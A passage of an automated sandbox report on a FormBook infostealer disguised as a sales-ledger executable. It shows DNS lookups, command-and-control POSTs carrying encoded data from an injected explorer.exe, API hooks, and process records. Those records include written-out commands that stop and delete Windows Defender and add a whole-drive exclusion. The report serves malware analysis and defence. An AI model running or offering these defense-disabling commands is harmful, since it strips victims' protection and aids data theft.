Apr 12, 2021 14:41:37.750791073 CEST	192.168.2.3	8.8.8.8	0x9769	Standard query (0)	www.soretyje.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 14:41:17.344877958 CEST	8.8.8.8	192.168.2.3	0xf110	No error (0)	www.seniorlivingcaelderly.com		185.53.179.90	A (IP address)	IN (0x0001)
Apr 12, 2021 14:41:37.835771084 CEST	8.8.8.8	192.168.2.3	0x9769	No error (0)	www.soretyje.com		81.17.18.194	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.seniorlivingcaelderly.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49737	185.53.179.90	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:41:17.437400103 CEST	5700	OUT	GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1 Host: www.seniorlivingcaelderly.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2021 14:41:17.477700949 CEST	5701	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 12 Apr 2021 12:41:17 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49738	185.53.179.90	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:41:19.604176998 CEST	5702	OUT	POST /suod/ HTTP/1.1 Host: www.seniorlivingcaelderly.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.seniorlivingcaelderly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.seniorlivingcaelderly.com/suod/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49739	185.53.179.90	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 14:41:19.649346113 CEST	5716	OUT	POST /suod/ HTTP/1.1 Host: www.seniorlivingcaelderly.com Connection: close Content-Length: 170153 Cache-Control: no-cache Origin: http://www.seniorlivingcaelderly.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.seniorlivingcaelderly.com/suod/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 53 78 6f 3d 44 4f 4c 31 47 32 32 73 76 55 45 78 75 58 69 51 6a 44 6d 75 35 69 6a 62 79 55 67 5a 6f 72 30 7a 72 6b 57 79 39 54 57 38 70 47 62 6b 6b 38 4f 52 34 66 48 53 68 4f 71 32 57 47 78 36 43 79 49 73 64 72 72 77 65 49 6f 79 34 54 47 6a 62 66 4b 7a 51 31 35 51 43 46 4e 4c 6d 35 38 49 53 5f 68 41 30 50 48 6f 30 34 42 53 43 63 75 4e 78 6d 68 55 35 4e 58 45 73 48 4b 6c 37 7a 64 72 4d 45 31 51 48 74 65 47 51 70 48 6a 66 6c 5a 6d 7e 6f 68 71 4f 32 45 45 43 69 39 59 4a 70 4d 2d 63 37 46 4c 72 36 79 6f 6d 6f 57 6b 4c 67 75 44 62 46 28 69 4e 78 5a 52 65 35 49 6b 45 35 68 57 79 49 51 77 67 42 45 6e 56 64 4f 59 30 64 39 59 46 65 45 48 68 6b 4b 55 51 4d 69 4f 70 79 47 55 47 53 63 50 62 6c 42 4c 6c 77 41 69 42 53 38 4d 39 76 35 57 39 4b 4f 5f 58 59 45 34 51 4e 43 32 47 31 67 55 4a 49 66 5f 69 7a 61 55 39 72 69 7a 28 75 6c 4b 5a 6b 4e 44 57 75 4a 30 79 7a 54 30 51 46 76 33 45 48 44 42 59 36 44 58 4f 58 41 6b 44 32 78 5a 6b 38 64 36 54 77 73 41 62 6a 4c 6c 32 4d 64 54 67 59 56 6b 77 77 34 31 79 42 52 30 7a 62 61 6c 69 39 7a 79 69 67 35 75 69 44 28 72 63 38 7e 37 65 78 46 69 34 57 47 73 5a 50 69 6d 62 74 76 38 65 2d 52 63 70 78 46 5f 4b 4d 69 72 32 67 38 42 54 50 44 4d 71 61 6a 6a 59 32 56 57 67 42 32 36 4e 4b 28 35 46 6e 4a 79 6e 41 69 55 52 69 47 54 28 53 69 54 77 52 75 57 53 75 78 48 71 49 48 68 37 42 44 4e 53 75 55 6d 42 74 43 4c 71 31 67 6f 48 36 64 4b 56 4e 47 57 28 67 47 6e 7e 78 28 74 28 62 6b 56 6c 72 74 56 7a 78 35 69 6f 5f 47 65 36 57 73 63 56 62 4f 73 57 45 36 37 33 34 6b 5f 58 69 6c 6c 36 77 4d 36 66 73 70 4c 7e 48 45 50 42 34 45 62 34 42 54 44 37 49 4c 56 31 4b 7e 44 69 54 4e 69 38 4f 73 59 36 42 63 42 78 30 65 49 71 38 5a 34 45 53 48 67 55 75 58 47 53 66 74 6e 30 45 72 45 77 74 73 56 32 63 33 6b 45 37 65 76 42 65 61 46 64 5a 56 32 74 56 58 74 6f 59 31 6c 44 62 4c 73 36 38 30 6c 62 53 69 51 6c 6b 70 46 50 36 62 50 64 46 33 48 30 74 57 4a 7a 49 64 41 44 72 36 6f 37 71 54 51 28 30 49 33 56 51 44 72 7a 35 6a 73 6f 62 46 43 38 71 66 6b 48 51 6b 66 67 65 78 52 36 58 28 39 74 56 56 6d 66 46 73 65 62 74 36 73 6c 53 50 30 6a 56 66 50 4f 36 57 48 52 52 4b 66 63 38 69 73 62 54 7e 52 76 32 52 54 51 30 58 78 66 6b 4d 62 4c 68 54 41 38 74 73 68 4b 31 31 34 46 47 42 7a 38 56 74 52 42 56 73 42 28 6c 6e 4a 51 62 30 35 50 76 48 51 6d 32 45 75 4d 6d 62 48 28 2d 34 57 79 4f 55 75 4a 7a 53 6a 39 56 64 73 65 50 28 4e 74 4a 62 30 54 30 59 50 4e 6b 55 73 4d 71 6e 76 72 4f 53 57 37 30 38 47 69 62 64 6a 33 4c 73 51 76 34 64 74 6a 45 30 4c 41 7a 7e 42 67 51 63 4d 78 64 28 76 72 5a 64 4a 4a 42 4d 76 28 44 30 46 30 41 57 38 4e 4a 77 56 73 69 70 33 6d 6f 56 52 57 66 71 30 32 59 4f 6e 77 78 78 66 4a 52 7e 41 61 71 65 55 62 67 48 2d 33 70 51 37 37 4d 61 35 69 58 7a 70 6b 73 35 4a 6a 41 49 5a 68 49 36 32 4e 71 74 67 68 42 64 56 37 4e 74 68 61 68 75 4c 6f 31 49 65 76 63 53 4b 73 5f 68 6e 6c 5f 66 33 49 52 4f 69 50 6c 33 4d 6b 55 64 61 36 46 71 4e 70 4b 31 6c 28 65 51 48 47 30 4f 4b 47 30 36 58 78 72 36 33 41 75 55 46 62 48 73 53 35 61 59 4c 55 67 4c 6c 66 30 6d 58 75 6d 7a 77 28 5a 4b 30 48 39 56 34 30 33 49 33 37 32 76 6a 42 72 31 51 6d 73 41 61 61 48 7a 46 51 5a 6b 49 46 5f 4f 47 65 6a 65 59 70 62 34 51 4f 52 55 4b 54 38 30 5a 4a 45 43 6e 65 4b 45 56 48 2d 6f 4f 51 35 4a 78 50 4d 28 39 63 50 30 39 7e 34 35 6a 6b 6d 4c 50 7a 41 4b 67 4d 59 69 67 43 79 49 34 74 64 6f 31 34 6d 44 6e 4e 52 57 48 65 71 69 42 61 68 30 37 31 45 70 5f 32 68 44 65 47 43 44 36 44 30 79 69 37 6b 34 5a 73 47 54 34 38 55 50 49 6f 39 63 61 62 4f 49 78 32 30 71 58 72 4a 56 67 63 4d 31 55 69 6e 7e 4a 79 4b 6b 7a 69 54 50 65 7a 66 6d 37 44 45 67 76 74 52 72 4e 70 30 42 57 4e 6d 56 44 4d 48 74 6b 44 45 7e 49 31 6c 78 2d 50 64 34 70 39 46 62 65 68 2d 33 51 5a 4a 53 36 37 32 69 65 68 45 44 78 53 44 4b 73 74 72 7e 6e 79 47 64 6d 33 5f 6e 6c 71 65 55 70 28 6a 39 72 6f 4c 56 6b 66 42 4b 53 34 68 47 4a 31 4f 6c 34 45 5f 72 78 5a 65 73 30 64 75 4a 4b 33 65 4c 4e 5a 63 57 71 6c 69 72 44 57 2d 75 65 57 30 30 38 32 37 45 75 36 6a 4b 57 67 77 70 4d 70 62 61 74 38 51 28 67 39 59 58 55 65 4a 6c 78 35 68 4c 51 38 4b 6d 67 69 69 61 57 33 47 47 5a 57 74 52 4b 75 4c 5a 56 66 4e 41 72 4d 47 7a Data Ascii: Sxo=DOL1G22svUExuXiQjDmu5ijbyUgZor0zrkWy9TW8pGbkk8OR4fHShOq2WGx6CyIsdrrweIoy4TGjbfKzQ15QCFNLm58IS_hA0PHo04BSCcuNxmhU5NXEsHKl7zdrME1QHteGQpHjflZm~ohqO2EECi9YJpM-c7FLr6yomoWkLguDbF(iNxZRe5IkE5hWyIQwgBEnVdOY0d9YFeEHhkKUQMiOpyGUGScPblBLlwAiBS8M9v5W9KO_XYE4QNC2G1gUJIf_izaU9riz(ulKZkNDWuJ0yzT0QFv3EHDBY6DXOXAkD2xZk8d6TwsAbjLl2MdTgYVkww41yBR0zbali9zyig5uiD(rc8~7exFi4WGsZPimbtv8e-RcpxF_KMir2g8BTPDMqajjY2VWgB26NK(5FnJynAiURiGT(SiTwRuWSuxHqIHh7BDNSuUmBtCLq1goH6dKVNGW(gGn~x(t(bkVlrtVzx5io_Ge6WscVbOsWE6734k_Xill6wM6fspL~HEPB4Eb4BTD7ILV1K~DiTNi8OsY6BcBx0eIq8Z4ESHgUuXGSftn0ErEwtsV2c3kE7evBeaFdZV2tVXtoY1lDbLs680lbSiQlkpFP6bPdF3H0tWJzIdADr6o7qTQ(0I3VQDrz5jsobFC8qfkHQkfgexR6X(9tVVmfFsebt6slSP0jVfPO6WHRRKfc8isbT~Rv2RTQ0XxfkMbLhTA8tshK114FGBz8VtRBVsB(lnJQb05PvHQm2EuMmbH(-4WyOUuJzSj9VdseP(NtJb0T0YPNkUsMqnvrOSW708Gibdj3LsQv4dtjE0LAz~BgQcMxd(vrZdJJBMv(D0F0AW8NJwVsip3moVRWfq02YOnwxxfJR~AaqeUbgH-3pQ77Ma5iXzpks5JjAIZhI62NqtghBdV7NthahuLo1IevcSKs_hnl_f3IROiPl3MkUda6FqNpK1l(eQHG0OKG06Xxr63AuUFbHsS5aYLUgLlf0mXumzw(ZK0H9V403I372vjBr1QmsAaaHzFQZkIF_OGejeYpb4QORUKT80ZJECneKEVH-oOQ5JxPM(9cP09~45jkmLPzAKgMYigCyI4tdo14mDnNRWHeqiBah071Ep_2hDeGCD6D0yi7k4ZsGT48UPIo9cabOIx20qXrJVgcM1Uin~JyKkziTPezfm7DEgvtRrNp0BWNmVDMHtkDE~I1lx-Pd4p9Fbeh-3QZJS672iehEDxSDKstr~nyGdm3_nlqeUp(j9roLVkfBKS4hGJ1Ol4E_rxZes0duJK3eLNZcWqlirDW-ueW00827Eu6jKWgwpMpbat8Q(g9YXUeJlx5hLQ8KmgiiaW3GGZWtRKuLZVfNArMGz0tHyP9IYJg3~YU3TcsZFbWcvlsffTz25a2i3whGX8eODLcv9sm7VCdbqAfGQ2QdJ1jZziArurLUSrGAFuBOhlPjoVVc62U2a4sULFUceAC1vOWrfEuq9H2jKqK9zKpG2ridn5YR1DckHKdSin4AyXHfIHWjDINK4hl0MiVs5NG4BRlGt6FeoBrKGKY4vpPj36t1nQm896PS0cHmeFUwwB2M7EBZY7C67irbSz2yJXjW04yrt-D6lGDRPowf1b2zwdZKg1IteMke66cpTusULXFOfAFvOraJzdxByV(pRwp9KAcPgSF9NcWbXtkglxCq5o83Hx6biCJtHDcm28KMK8VVqbESb2z2tha_NqkwUdA7TRR1O0DNS-U7eP~-nakVDQMLlwWHwUZ9CTopCbo2MsC85y01JwH5JY32WxRmQQI-37VQ6nFMEA(3V-5PMpMZzmukc_Z44Q2xy6JHw5Ll44DEFRJmtWg9ERbxE14kURtEMRp0ZjrLp00B72Fp5-XMM1uoF1semS6bwYl0S-3xhfg6(9rBbYC7tMR8qG~5xEdU4flF1VljXmNMy_Fv9LaNC-t2O3(AP_~jbFaLTm4qQ97eLg5ehox88sfNaGSiEem55QhHMz4XIbd9Mrv6ZHc7vwW7FHj7lOpI(Kx49EZae0V-Ko2-aevSDoRS9qj9Zff_4WsbLrfXyG9Zt6Z_QW1wMeUJDHzSfXo9a9YmwXk3s6OHAel3c2SttXRG5TeNKgTjqCDrFWG3x1AodmgdSS7iBc6B9jqA92pOXjJkuWmUcDTg9XCB082Eep43F65r5QDnhjhc1kCh7WgbZNCjLi1ndm9Y~Su4TNURRHgksb2W1kYHMa3p~Y68Mx93TPSjl2M7M3aBtq4Ji8kALXIhXMiOG5~fksYMk01JFHYOQvhyXPbrIAdWO6TqcMigwwZPv0mx76cLupeOJIolhxU29ksLCUQJNZ5D7m1LUSsfkkzNkf2VE0FCdOI3rfOngJPcEVAHCK7C89iWWOZqYV05nuXgZD5dEKWv~QJob1dVkMjW4NLfE0zrLTnQFgM_ob9oyO1to1VMxJ0DqCwvz1DOkft5r515FO6vXMbBY-EoG_JjLYD_E_5AxS~wHdvVTinSAZ63HL0pFEDNY0mW1_2KyrlD8xHofAIyBF8tOudy(_p3DtWpcNNaejmjbBUxHV8PfezKBkuTUhDs0eyrhvdRPTg34vyQnc0lG6Jc1tFOiFJNg2~HhLyTg-(xFw8XOZvY2j~A(hpTDFkIcT3XBpk04BjnP4CeZscID61zqbHWHyGC4kCgCU7eZVA5aG1w15nGSjcYfVkRHOBwoUcpBRdDMfoacjU_(A1-9xmKa7pcjey4S_DHWdtVukYsRHQgD_a49Dv4z1HJAYvqa-gKJdi6JwfwPJ5ah7lw5wbKNWe9jFDMjtGNJ4pwAF1HG_TWcYM6YxpY1eN3MEQqcs1xS4g3(x6Z7ZO1phXEsGX3o6zeWhM54UwUY-973n~qO_ucn9oWuI4YEjYuMW1RDfEeW6kprY62ECqAPVEaUF(T~V9jMZJ1mTzvgzdiPAAwGTumYHlP5_oHi_K69coN6VoQT8c0DsG0qc6hctqiSd~WzivWwNQhbbEiyTMvTQo1H-tlgWThhfaYK54y9DtabsXREpeU78iXwTodvyi3tbVpU3UOYG(_j2XwCpL1BvBUu1lThgzpZMbLIRrOEL39nSv_eIXD4DzwxVwDQVx3~xjC0R6fVdhunrcUf0WEaOqxRRp3nMtwRB7DMDpaTKAR7xd4exgoyVTTlxRU2vcj1tDDqH1OoiKsDGIwvDIibrFSqJ0qWU5kvGt9501o(97c6xnGd1AGLOStbc4C(7mmtkAI9IT_zo~vekdKfzhfCFEgWvHvw1WVlZTHr78uYetrvaHCwcbvJx9y3Tbwi31Ep7PBRgN6dqfkPAYD8J3fdZN4DhMdk00EvsJaPglW7kkEjxkIjsQ6XkJLsZiEFT1UzZ(R5ZIa6aD7BwdKmiOa1LOWwVJT6d4NFND04wt53erS1xazPqYy0Sh40RlLDC17idCzb_Z0elpYv0nwM6b5DBAE6I10idA9067RV5ZJYuSZhHOaNlAHEV960SfUvfT2VK9_HBqNBTHf26zHBcdXLSOgIDj3HzYqWpgVg0mdnZnRsV0WFYWCnHy0lvcL5TMow1Mu9J9Sz8ONL_L1fMAWNbi9It5BXptqIss1nmPUrc6BUrLHVua0wCef0TT1C9YD3GLkWvo-gYGAv9tNIPFEi14rsAZpd00MW_4jy5alQck5d2BnGjKKLTtXclNNyUQoaRGBhonBarta~8k8fcHKL1~Y3CCRA37eEAZPnO8Bt5NPEr6IwXbGdZjXxMQ4FAznZe6-K-eBv5~YBYYI(I4QBgugVIbTk2Vd3H2ozt~1GDzwaJj0ziM9qgVsdG1LQXEKiS7PetMslLQXwGSl4xOWhyjSNtiG4F6j36xh6FV5TyTIEqm5TR2UlhPHD_WWtOtS~1EEjnN394QajXyYFYzm5sTV(roo2SbB9Esm9RVcMRG0HFDg8s9Kk_dxZEdj8VoGsUmBsz5mXJoAaDfvkQ53YrKoqv1R72xhWs6wbojFbaVVimk2M3N2LlC_DhkhY8WCeVQK(MnzFRblKlnlCNrA~SlGbN7DfP7ELWWqoUbiJxQXfmcZF5VqDtVzbqAZ52JtSxFLmi(UNwzWtdQ0rov9aibHut3Y

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xEE
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xEE
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xEE
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xEE

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Require your Sales Ledger from 01-April-2020.exe PID: 5792 Parent PID: 5616

General

Start time:	14:39:18
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
Imagebase:	0x500000
File size:	736256 bytes
MD5 hash:	C7C27E1859F1593AEDB1EEBF0A15175E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: AdvancedRun.exe PID: 2644 Parent PID: 5792

General

Start time:	14:39:50
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: AdvancedRun.exe PID: 6200 Parent PID: 2644

General

Start time:	14:39:54
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: AdvancedRun.exe PID: 6332 Parent PID: 5792

General

Start time:	14:39:55
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: AdvancedRun.exe PID: 7124 Parent PID: 6332

General

Start time:	14:40:02
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 2420 Parent PID: 5792

General

Start time:	14:40:07
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'powershell' Add-MpPreference -ExclusionPath C:\
Imagebase:	0x2d0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 6220 Parent PID: 2420

General

Start time:	14:40:07
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: Require your Sales Ledger from 01-April-2020.exe PID: 6300 Parent PID: 5792

General

Start time:	14:40:08
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Imagebase:	0x710000
File size:	736256 bytes
MD5 hash:	C7C27E1859F1593AEDB1EEBF0A15175E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low

Analysis Process: explorer.exe PID: 3388 Parent PID: 6300

General

Start time:	14:40:10
Start date:	12/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmmon32.exe PID: 6856 Parent PID: 3388

General

Start time:	14:40:33
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0x960000
File size:	36864 bytes
